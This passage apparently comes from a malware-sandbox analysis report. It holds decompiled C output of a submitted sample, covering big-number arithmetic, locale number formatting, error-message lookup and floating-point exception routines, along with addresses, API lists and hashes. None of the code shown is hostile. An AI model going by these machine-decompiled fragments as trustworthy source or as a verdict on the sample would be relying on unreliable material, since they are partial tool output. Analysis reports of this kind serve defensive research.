															L51:
															_v8 = _t263;
															goto L52;
														}
														_t209 = _v28;
														goto L51;
													}
												}
											}
											L52:
											__eflags = _t209;
											if(_t209 != 0) {
												L54:
												_t280 = _v60;
												_t334 = 0;
												_t355 = 0;
												__eflags = _t280;
												if(_t280 != 0) {
													_t266 = _v20;
													_t219 =  &(_a8[1]);
													__eflags = _t219;
													_v24 = _t219;
													_v16 = _t280;
													do {
														_v44 =  *_t219;
														_t225 =  *_t266;
														_t286 = _t334 + _v72 * _v44;
														asm("adc esi, edx");
														_t334 = _t355;
														_t355 = 0;
														__eflags = _t225 - _t286;
														if(_t225 < _t286) {
															_t334 = _t334 + 1;
															asm("adc esi, esi");
														}
														 *_t266 = _t225 - _t286;
														_t266 = _t266 + 4;
														_t219 = _v24 + 4;
														_t164 =  &_v16;
														 *_t164 = _v16 - 1;
														__eflags =  *_t164;
														_v24 = _t219;
													} while ( *_t164 != 0);
													_t263 = _v8;
													_t280 = _v60;
												}
												__eflags = 0 - _t355;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L63:
														__eflags = _t280;
														if(_t280 != 0) {
															_t338 = _t280;
															_t314 = _v20;
															_t362 =  &(_a8[1]);
															__eflags = _t362;
															_t265 = 0;
															do {
																_t282 =  *_t314;
																_t172 = _t362 + 4; // 0xa6a5959
																_t362 = _t172;
																_t314 = _t314 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
																asm("adc eax, 0x0");
																_t265 = 0;
																_t338 = _t338 - 1;
																__eflags = _t338;
															} while (_t338 != 0);
															_t263 = _v8;
														}
														_t263 = _t263 + 0xffffffff;
														asm("adc dword [ebp-0x18], 0xffffffff");
													} else {
														__eflags = _v52 - _t334;
														if(_v52 < _t334) {
															goto L63;
														}
													}
												}
												_t213 = _v12 - 1;
												__eflags = _t213;
												_v16 = _t213;
											} else {
												__eflags = _t263;
												if(_t263 != 0) {
													goto L54;
												}
											}
											_t331 = 0 + _t263;
											asm("adc esi, 0x0");
											_v20 = _v20 - 4;
											_t313 = _v32 - 1;
											_t262 = _a4;
											_t278 = _v80 - 4;
											_t206 = _v12 - 1;
											_v76 = _t331;
											_v32 = _t313;
											_v80 = _t278;
											_v12 = _t206;
											__eflags = _t313;
										} while (_t313 >= 0);
									}
									_t309 = _v16 + 1;
									_t204 = _t309;
									__eflags = _t204 -  *_t262;
									if(_t204 <  *_t262) {
										_t191 = _t204 + 1; // 0xa2e4cd
										_t274 =  &(_t262[_t191]);
										do {
											 *_t274 = 0;
											_t194 =  &(_t274[1]); // 0x91850fc2
											_t274 = _t194;
											_t204 = _t204 + 1;
											__eflags = _t204 -  *_t262;
										} while (_t204 <  *_t262);
									}
									 *_t262 = _t309;
									__eflags = _t309;
									if(_t309 != 0) {
										while(1) {
											_t271 =  *_t262;
											__eflags = _t262[_t271];
											if(_t262[_t271] != 0) {
												goto L78;
											}
											_t272 = _t271 + 0xffffffff;
											__eflags = _t272;
											 *_t262 = _t272;
											if(_t272 != 0) {
												continue;
											}
											goto L78;
										}
									}
									L78:
									return _t331;
								} else {
									goto L23;
								}
							}
						} else {
							_t6 =  &(_t328[1]); // 0xfc23b5a
							_t295 =  *_t6;
							_v44 = _t295;
							__eflags = _t295 - 1;
							if(_t295 != 1) {
								__eflags = _t349;
								if(_t349 != 0) {
									_t342 = 0;
									_v12 = 0;
									_v8 = 0;
									_v20 = 0;
									__eflags = _t349 - 0xffffffff;
									if(_t349 != 0xffffffff) {
										_t250 = _v16 + 1;
										__eflags = _t250;
										_v32 = _t250;
										_t373 =  &(_t262[_t349 + 1]);
										do {
											_t253 = E00A31C00( *_t373, _t342, _t295, 0);
											_v68 = _t303;
											_t373 = _t373 - 4;
											_v20 = _t262;
											_t342 = _t295;
											_t303 = 0 + _t253;
											asm("adc ecx, 0x0");
											_v12 = _t303;
											_t34 =  &_v32;
											 *_t34 = _v32 - 1;
											__eflags =  *_t34;
											_v8 = _v12;
											_t295 = _v44;
										} while ( *_t34 != 0);
										_t262 = _a4;
									}
									_v544 = 0;
									_t41 =  &(_t262[1]); // 0x4
									_t370 = _t41;
									 *_t262 = 0;
									E00A2B851(_t370, 0x1cc,  &_v540, 0);
									_t247 = _v20;
									__eflags = 0 - _t247;
									 *_t370 = _t342;
									_t262[2] = _t247;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t262 = 0xbadbae;
									return _v12;
								} else {
									_t14 =  &(_t262[1]); // 0x4
									_t344 = _t14;
									_v544 = 0;
									 *_t262 = 0;
									E00A2B851(_t344, 0x1cc,  &_v540, 0);
									_t256 = _t262[1];
									_t322 = _t256 % _v44;
									__eflags = 0 - _t322;
									 *_t344 = _t322;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t262 =  ~0x00000000;
									return _t256 / _v44;
								}
							} else {
								_t9 =  &(_t262[1]); // 0x4
								_v544 = _t198;
								 *_t262 = _t198;
								E00A2B851(_t9, 0x1cc,  &_v540, _t198);
								__eflags = 0;
								return _t262[1];
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return _t197;
				}
			}























































































                                                        0x00a2cebc
                                                        0x00a2cebf
                                                        0x00a2cec3
                                                        0x00a2cecd
                                                        0x00a2ced0
                                                        0x00a2ced2
                                                        0x00a2ced4
                                                        0x00a2cee1
                                                        0x00a2cee1
                                                        0x00a2cee4
                                                        0x00a2cee4
                                                        0x00a2cee7
                                                        0x00a2ceea
                                                        0x00a2ceec
                                                        0x00a2d01f
                                                        0x00a2d021
                                                        0x00a2d06a
                                                        0x00a2d06e
                                                        0x00a2d074
                                                        0x00a2d023
                                                        0x00a2d025
                                                        0x00a2d028
                                                        0x00a2d02a
                                                        0x00a2d02d
                                                        0x00a2d02f
                                                        0x00a2d031
                                                        0x00a2d065
                                                        0x00a2d065
                                                        0x00a2d065
                                                        0x00a2d033
                                                        0x00a2d038
                                                        0x00a2d03e
                                                        0x00a2d03e
                                                        0x00a2d041
                                                        0x00a2d043
                                                        0x00a2d045
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2d047
                                                        0x00a2d048
                                                        0x00a2d04b
                                                        0x00a2d04e
                                                        0x00a2d050
                                                        0x00000000
                                                        0x00a2d052
                                                        0x00000000
                                                        0x00a2d052
                                                        0x00000000
                                                        0x00a2d050
                                                        0x00a2d054
                                                        0x00a2d05b
                                                        0x00a2d05f
                                                        0x00a2d063
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2d063
                                                        0x00a2d066
                                                        0x00a2d066
                                                        0x00a2d068
                                                        0x00a2d075
                                                        0x00a2d078
                                                        0x00a2d07b
                                                        0x00a2d07e
                                                        0x00a2d07e
                                                        0x00a2d082
                                                        0x00a2d085
                                                        0x00a2d088
                                                        0x00a2d08b
                                                        0x00a2d096
                                                        0x00a2d08d
                                                        0x00a2d092
                                                        0x00a2d092
                                                        0x00a2d0a0
                                                        0x00a2d0a5
                                                        0x00a2d0a8
                                                        0x00a2d0aa
                                                        0x00a2d0b4
                                                        0x00a2d0b7
                                                        0x00a2d0be
                                                        0x00a2d0c1
                                                        0x00a2d0c4
                                                        0x00a2d0cc
                                                        0x00a2d0d2
                                                        0x00a2d0d2
                                                        0x00a2d0d2
                                                        0x00a2d0d2
                                                        0x00a2d0c4
                                                        0x00a2d0d7
                                                        0x00a2d0de
                                                        0x00a2d0de
                                                        0x00a2d0e1
                                                        0x00a2d0e4
                                                        0x00a2d316
                                                        0x00a2d316
                                                        0x00a2d0ea
                                                        0x00a2d0ea
                                                        0x00a2d0f0
                                                        0x00a2d0f3
                                                        0x00a2d0f6
                                                        0x00a2d0f9
                                                        0x00a2d0fc
                                                        0x00a2d0ff
                                                        0x00a2d102
                                                        0x00a2d102
                                                        0x00a2d105
                                                        0x00a2d10c
                                                        0x00a2d10c
                                                        0x00a2d107
                                                        0x00a2d107
                                                        0x00a2d107
                                                        0x00a2d10e
                                                        0x00a2d112
                                                        0x00a2d115
                                                        0x00a2d117
                                                        0x00a2d11a
                                                        0x00a2d121
                                                        0x00a2d124
                                                        0x00a2d127
                                                        0x00a2d132
                                                        0x00a2d135
                                                        0x00a2d13a
                                                        0x00a2d13f
                                                        0x00a2d146
                                                        0x00a2d14b
                                                        0x00a2d14d
                                                        0x00a2d14f
                                                        0x00a2d153
                                                        0x00a2d156
                                                        0x00a2d159
                                                        0x00a2d161
                                                        0x00a2d16a
                                                        0x00a2d16a
                                                        0x00a2d16c
                                                        0x00a2d16f
                                                        0x00a2d16f
                                                        0x00a2d159
                                                        0x00a2d179
                                                        0x00a2d17e
                                                        0x00a2d183
                                                        0x00a2d185
                                                        0x00a2d188
                                                        0x00a2d18a
                                                        0x00a2d18d
                                                        0x00a2d190
                                                        0x00a2d192
                                                        0x00a2d195
                                                        0x00a2d198
                                                        0x00a2d19a
                                                        0x00a2d1a1
                                                        0x00a2d1a6
                                                        0x00a2d1a9
                                                        0x00a2d1b3
                                                        0x00a2d1b5
                                                        0x00a2d1b7
                                                        0x00a2d1ba
                                                        0x00a2d1ba
                                                        0x00a2d1bc
                                                        0x00a2d1bf
                                                        0x00a2d1c2
                                                        0x00a2d1c5
                                                        0x00a2d1c8
                                                        0x00a2d19c
                                                        0x00a2d19c
                                                        0x00a2d19f
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2d19f
                                                        0x00a2d1cb
                                                        0x00a2d1cd
                                                        0x00a2d1cf
                                                        0x00000000
                                                        0x00a2d1d1
                                                        0x00a2d1d1
                                                        0x00a2d1d4
                                                        0x00a2d1d6
                                                        0x00a2d1d6
                                                        0x00a2d1e4
                                                        0x00a2d1e7
                                                        0x00a2d1ec
                                                        0x00a2d1ee
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2d1f0
                                                        0x00a2d1f7
                                                        0x00a2d1f7
                                                        0x00a2d1fa
                                                        0x00a2d1fd
                                                        0x00a2d200
                                                        0x00a2d203
                                                        0x00a2d203
                                                        0x00a2d206
                                                        0x00a2d209
                                                        0x00a2d20d
                                                        0x00a2d210
                                                        0x00a2d212
                                                        0x00a2d215
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2d217
                                                        0x00a2d215
                                                        0x00a2d1f2
                                                        0x00a2d1f2
                                                        0x00a2d1f5
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2d1f5
                                                        0x00a2d21c
                                                        0x00a2d21c
                                                        0x00000000
                                                        0x00a2d21c
                                                        0x00a2d219
                                                        0x00000000
                                                        0x00a2d219
                                                        0x00a2d1d4
                                                        0x00a2d1cf
                                                        0x00a2d21f
                                                        0x00a2d21f
                                                        0x00a2d221
                                                        0x00a2d22b
                                                        0x00a2d22b
                                                        0x00a2d22e
                                                        0x00a2d230
                                                        0x00a2d232
                                                        0x00a2d234
                                                        0x00a2d239
                                                        0x00a2d23c
                                                        0x00a2d23c
                                                        0x00a2d23f
                                                        0x00a2d242
                                                        0x00a2d245
                                                        0x00a2d247
                                                        0x00a2d25c
                                                        0x00a2d25e
                                                        0x00a2d260
                                                        0x00a2d262
                                                        0x00a2d264
                                                        0x00a2d266
                                                        0x00a2d268
                                                        0x00a2d26a
                                                        0x00a2d26d
                                                        0x00a2d26d
                                                        0x00a2d271
                                                        0x00a2d273
                                                        0x00a2d279
                                                        0x00a2d27c
                                                        0x00a2d27c
                                                        0x00a2d27c
                                                        0x00a2d280
                                                        0x00a2d280
                                                        0x00a2d285
                                                        0x00a2d288
                                                        0x00a2d288
                                                        0x00a2d28d
                                                        0x00a2d28f
                                                        0x00a2d291
                                                        0x00a2d298
                                                        0x00a2d298
                                                        0x00a2d29a
                                                        0x00a2d29f
                                                        0x00a2d2a1
                                                        0x00a2d2a4
                                                        0x00a2d2a4
                                                        0x00a2d2a7
                                                        0x00a2d2b0
                                                        0x00a2d2b0
                                                        0x00a2d2b2
                                                        0x00a2d2b2
                                                        0x00a2d2b7
                                                        0x00a2d2bd
                                                        0x00a2d2c1
                                                        0x00a2d2c4
                                                        0x00a2d2c7
                                                        0x00a2d2c9
                                                        0x00a2d2c9
                                                        0x00a2d2c9
                                                        0x00a2d2ce
                                                        0x00a2d2ce
                                                        0x00a2d2d1
                                                        0x00a2d2d4
                                                        0x00a2d293
                                                        0x00a2d293
                                                        0x00a2d296
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2d296
                                                        0x00a2d291
                                                        0x00a2d2db
                                                        0x00a2d2db
                                                        0x00a2d2dc
                                                        0x00a2d223
                                                        0x00a2d223
                                                        0x00a2d225
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2d225
                                                        0x00a2d2ec
                                                        0x00a2d2f1
                                                        0x00a2d2f4
                                                        0x00a2d2f8
                                                        0x00a2d2f9
                                                        0x00a2d2fc
                                                        0x00a2d2ff
                                                        0x00a2d300
                                                        0x00a2d303
                                                        0x00a2d306
                                                        0x00a2d309
                                                        0x00a2d30c
                                                        0x00a2d30c
                                                        0x00a2d314
                                                        0x00a2d31b
                                                        0x00a2d31c
                                                        0x00a2d31e
                                                        0x00a2d320
                                                        0x00a2d322
                                                        0x00a2d325
                                                        0x00a2d330
                                                        0x00a2d330
                                                        0x00a2d336
                                                        0x00a2d336
                                                        0x00a2d339
                                                        0x00a2d33a
                                                        0x00a2d33a
                                                        0x00a2d330
                                                        0x00a2d33e
                                                        0x00a2d340
                                                        0x00a2d342
                                                        0x00a2d344
                                                        0x00a2d344
                                                        0x00a2d346
                                                        0x00a2d34a
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2d34c
                                                        0x00a2d34c
                                                        0x00a2d34f
                                                        0x00a2d351
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2d351
                                                        0x00a2d344
                                                        0x00a2d353
                                                        0x00a2d35d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2d068
                                                        0x00a2cef2
                                                        0x00a2cef2
                                                        0x00a2cef2
                                                        0x00a2cef5
                                                        0x00a2cef8
                                                        0x00a2cefb
                                                        0x00a2cf2c
                                                        0x00a2cf2e
                                                        0x00a2cf79
                                                        0x00a2cf7b
                                                        0x00a2cf82
                                                        0x00a2cf89
                                                        0x00a2cf8c
                                                        0x00a2cf8f
                                                        0x00a2cf95
                                                        0x00a2cf95
                                                        0x00a2cf96
                                                        0x00a2cf99
                                                        0x00a2cfa0
                                                        0x00a2cfa9
                                                        0x00a2cfae
                                                        0x00a2cfb1
                                                        0x00a2cfb6
                                                        0x00a2cfb9
                                                        0x00a2cfbb
                                                        0x00a2cfc0
                                                        0x00a2cfc3
                                                        0x00a2cfc6
                                                        0x00a2cfc6
                                                        0x00a2cfc6
                                                        0x00a2cfca
                                                        0x00a2cfcd
                                                        0x00a2cfcd
                                                        0x00a2cfd2
                                                        0x00a2cfd2
                                                        0x00a2cfdd
                                                        0x00a2cfe8
                                                        0x00a2cfe8
                                                        0x00a2cfeb
                                                        0x00a2cff7
                                                        0x00a2cffc
                                                        0x00a2d007
                                                        0x00a2d009
                                                        0x00a2d00b
                                                        0x00a2d011
                                                        0x00a2d016
                                                        0x00a2d018
                                                        0x00a2d01e
                                                        0x00a2cf30
                                                        0x00a2cf3c
                                                        0x00a2cf3c
                                                        0x00a2cf3f
                                                        0x00a2cf4f
                                                        0x00a2cf55
                                                        0x00a2cf5c
                                                        0x00a2cf5e
                                                        0x00a2cf66
                                                        0x00a2cf68
                                                        0x00a2cf6a
                                                        0x00a2cf6f
                                                        0x00a2cf72
                                                        0x00a2cf78
                                                        0x00a2cf78
                                                        0x00a2cefd
                                                        0x00a2cf00
                                                        0x00a2cf04
                                                        0x00a2cf0a
                                                        0x00a2cf19
                                                        0x00a2cf23
                                                        0x00a2cf2b
                                                        0x00a2cf2b
                                                        0x00a2cefb
                                                        0x00a2ced6
                                                        0x00a2ced9
                                                        0x00a2cedf
                                                        0x00a2cedf
                                                        0x00a2cec5
                                                        0x00a2cecb
                                                        0x00a2cecb

                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e4c71cb9696925a17b0f1ed029d90042ab8403ec90c4966a08425d5b2b74d4a4
                                                        • Instruction ID: d3c8e903223298eee7162ade93279c8a3e535addec00152e3f82abd7d0ff418b
                                                        • Opcode Fuzzy Hash: e4c71cb9696925a17b0f1ed029d90042ab8403ec90c4966a08425d5b2b74d4a4
                                                        • Instruction Fuzzy Hash: C2020C71E002299BDF14CFADD9806ADFBF1FF48324F258269D919EB245D731AA41CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1A8CC Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A1A8CC(intOrPtr _a4, intOrPtr _a8, short* _a12, int _a16) {
				short _v104;
				short _v304;
				short* _t23;
				int _t24;

				if( *0xa3e610 == 0) {
					GetLocaleInfoW(0x400, 0xf,  &_v304, 0x64);
					 *0xa5eca8 = _v304;
					 *0xa5ecaa = 0;
					 *0xa3e610 = 0xa5eca8;
				}
				E00A10000(_a4, _a8,  &_v104, 0x32);
				_t23 = _a12;
				_t24 = _a16;
				 *_t23 = 0;
				GetNumberFormatW(0x400, 0,  &_v104, 0xa3e600, _t23, _t24);
				 *((short*)(_t23 + _t24 * 2 - 2)) = 0;
				return 0;
			}







                                                        0x00a1a8e4
                                                        0x00a1a8f2
                                                        0x00a1a8ff
                                                        0x00a1a907
                                                        0x00a1a90d
                                                        0x00a1a90d
                                                        0x00a1a923
                                                        0x00a1a928
                                                        0x00a1a92d
                                                        0x00a1a937
                                                        0x00a1a941
                                                        0x00a1a949
                                                        0x00a1a954

                                                        APIs
                                                        • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00A1A8F2
                                                        • GetNumberFormatW.KERNEL32 ref: 00A1A941
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: FormatInfoLocaleNumber
                                                        • String ID:
                                                        • API String ID: 2169056816-0
                                                        • Opcode ID: c40d9e5c3fffe150c876c0038bd5c802756704a80cd3c5e0d38c25ef39f5400f
                                                        • Instruction ID: dc7fdf8063fc335105ad2232e60c030eced18e380da5e112548a15161e14ce9e
                                                        • Opcode Fuzzy Hash: c40d9e5c3fffe150c876c0038bd5c802756704a80cd3c5e0d38c25ef39f5400f
                                                        • Instruction Fuzzy Hash: 87010876500208BADB10DFA5DC46FABB7A8EF19711F004962BA04971A1D3709A658BA5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A06EA8 Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 79%
                                                        			E00A06EA8(WCHAR* _a4, long _a8) {
				long _t3;
				signed int _t5;

				_t3 = GetLastError();
				if(_t3 == 0) {
					return 0;
				}
				_t5 = FormatMessageW(0x1200, 0, _t3, 0x400, _a4, _a8, 0);
				asm("sbb eax, eax");
				return  ~( ~_t5);
			}





                                                        0x00a06ea8
                                                        0x00a06eb0
                                                        0x00000000
                                                        0x00a06ed7
                                                        0x00a06ec9
                                                        0x00a06ed1
                                                        0x00000000

                                                        APIs
                                                        • GetLastError.KERNEL32(00A07016,00000000,00000400), ref: 00A06EA8
                                                        • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00A06EC9
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: ErrorFormatLastMessage
                                                        • String ID:
                                                        • API String ID: 3479602957-0
                                                        • Opcode ID: 0c501c1487f3e4f707522488ccbd98956d28be552840f89e3bbae394206aac1a
                                                        • Instruction ID: c5e38cec70ff4ef6c385e2d74395552ab1686462e7799c1334a1faba7521a5a4
                                                        • Opcode Fuzzy Hash: 0c501c1487f3e4f707522488ccbd98956d28be552840f89e3bbae394206aac1a
                                                        • Instruction Fuzzy Hash: A9D0C7753883157EEE114B70EC05F767B546756F46F10C5047357D90D1C57090359615
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A31464 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODECrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A31464(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed int _t195;
				signed int _t199;
				signed int _t202;
				void* _t203;
				void* _t206;
				signed int _t209;
				void* _t210;
				signed int _t225;
				unsigned int* _t240;
				signed char _t242;
				signed int* _t250;
				unsigned int* _t256;
				signed int* _t257;
				signed char _t259;
				long _t262;
				signed int* _t265;

				 *(_a4 + 4) = 0;
				_t262 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t242 = _a12;
				if((_t242 & 0x00000010) != 0) {
					_t262 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t242 & 0x00000002) != 0) {
					_t262 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t242 & 0x00000001) != 0) {
					_t262 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t242 & 0x00000004) != 0) {
					_t262 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t242 & 0x00000008) != 0) {
					_t262 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t265 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
				_t259 = E00A2EDC2(_a4);
				if((_t259 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t259 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t259 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t259 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t259 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t265 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffd | 1;
						L26:
						 *_t257 = _t225;
						L29:
						_t175 =  *_t265 & 0x00000300;
						if(_t175 == 0) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
							L35:
							 *_t250 = _t178;
							L36:
							_t179 = _a4;
							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t254 = _a4;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t240;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t240;
							}
							E00A2ED28(_t254);
							RaiseException(_t262, 0, 1,  &_a4);
							_t256 = _a4;
							if((_t256[2] & 0x00000010) != 0) {
								 *_t265 =  *_t265 & 0xfffffffe;
							}
							if((_t256[2] & 0x00000008) != 0) {
								 *_t265 =  *_t265 & 0xfffffffb;
							}
							if((_t256[2] & 0x00000004) != 0) {
								 *_t265 =  *_t265 & 0xfffffff7;
							}
							if((_t256[2] & 0x00000002) != 0) {
								 *_t265 =  *_t265 & 0xffffffef;
							}
							if((_t256[2] & 0x00000001) != 0) {
								 *_t265 =  *_t265 & 0xffffffdf;
							}
							_t195 =  *_t256 & 0x00000003;
							if(_t195 == 0) {
								 *_t265 =  *_t265 & 0xfffff3ff;
							} else {
								_t206 = _t195 - 1;
								if(_t206 == 0) {
									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t265 = _t209;
									L58:
									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
									if(_t199 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t265 = _t202;
										L65:
										if(_a28 == 0) {
											 *_t240 = _t256[0x14];
										} else {
											 *_t240 = _t256[0x14];
										}
										return _t202;
									}
									_t203 = _t199 - 1;
									if(_t203 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t202 = _t203 - 1;
									if(_t202 == 0) {
										 *_t265 =  *_t265 & 0xfffff3ff;
									}
									goto L65;
								}
								_t210 = _t206 - 1;
								if(_t210 == 0) {
									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t210 == 1) {
									 *_t265 =  *_t265 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}























                                                        0x00a31472
                                                        0x00a31479
                                                        0x00a3147e
                                                        0x00a31484
                                                        0x00a31487
                                                        0x00a3148d
                                                        0x00a31492
                                                        0x00a31497
                                                        0x00a31497
                                                        0x00a3149d
                                                        0x00a314a2
                                                        0x00a314a7
                                                        0x00a314a7
                                                        0x00a314ae
                                                        0x00a314b3
                                                        0x00a314b8
                                                        0x00a314b8
